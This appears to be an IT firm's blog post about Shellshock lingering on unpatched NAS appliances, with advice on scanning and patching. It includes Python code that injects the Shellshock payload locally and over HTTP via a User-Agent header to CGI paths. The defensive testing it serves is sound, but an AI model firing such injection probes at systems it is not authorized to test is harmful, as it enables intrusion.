This article in Ars Technica points out a fairly common issue that sometimes surprises even our more security-conscious customers. We are reminded that the famous Shellshock bug also affects what many consider appliances, in this case a NAS unit. In other words, IT departments may have patched all the servers affected by Shellshock but forgotten about the NAS devices (or not known about them at all).
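As a refresher, Shellshock lets an attacker smuggle commands after a bash function definition passed in through an environment variable. A quick local check, sketched here in Python, is to plant the classic test payload in the environment and see whether bash executes the trailing command. The variable name "x" and the marker string are arbitrary choices, not part of the bug itself:

```python
import subprocess

# Shellshock (CVE-2014-6271): a vulnerable bash runs commands that trail
# a function definition imported from the environment. A patched bash
# ignores everything after the function body.
env = {"x": "() { :; }; echo VULNERABLE"}

result = subprocess.run(
    ["bash", "-c", "true"],  # the command itself does nothing
    env=env,
    capture_output=True,
    text=True,
)

print("vulnerable" if "VULNERABLE" in result.stdout else "looks patched")
```

On a patched bash the marker never prints; on a vulnerable one the injected echo runs as bash starts up, before your actual command even executes.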
What can you do to reduce this risk? First, regular vulnerability scans of your entire network would have flagged the devices in question: even if you patch all the servers on your list, that list may not be complete and up to date. Second, a regular, comprehensive patching process helps keep all devices current on patches, service packs and firmware updates. Yes, firmware updates usually mean reboots. Sure, they are potentially risky and typically bring comparatively little immediate benefit. But going through the process of patching everything from the metal up every quarter not only keeps your environment's layered defenses up to date, it also forces you to dust off your DR process (you do have one of those, right?).
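To make the first suggestion concrete: a scanner's Shellshock check boils down to sending the same payload over the network, typically in an HTTP header that a bash-backed CGI script imports into its environment. Here is a bare-bones sketch; the CGI path and the host addresses are placeholders you would replace with your own inventory, and of course you should only probe hosts you are authorized to test:

```python
import urllib.request

# The leading "echo" emits a blank line so the marker lands in the HTTP
# body even when bash runs before the CGI script prints its headers.
PAYLOAD = "() { :; }; echo; echo SHELLSHOCK-TEST"

def probe(host: str, path: str = "/cgi-bin/status.cgi") -> bool:
    req = urllib.request.Request(
        f"http://{host}{path}",
        # CGI copies the User-Agent header into the HTTP_USER_AGENT
        # environment variable, which is where a vulnerable bash picks
        # up the injected function definition.
        headers={"User-Agent": PAYLOAD},
    )
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            return b"SHELLSHOCK-TEST" in resp.read()
    except OSError:
        return False  # host unreachable, or no CGI handler at this path

for host in ("192.0.2.10", "192.0.2.11"):  # documentation-range examples
    print(host, "VULNERABLE" if probe(host) else "no evidence at this path")
```

A real scanner tries many paths and headers (Cookie, Referer, and so on); the point is that anything network-reachable, appliance or not, ends up on the same list.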
Because this process means reboots (and lots of them), your patch/DR team will usually perform the work after hours. And because the process could generate some resume-refreshing events, people take it seriously. That means your DR/patch team will be focused, motivated and undisturbed, and they will come to know their environment inside and out. All of this will really pay off if you ever find yourself in a real DR situation.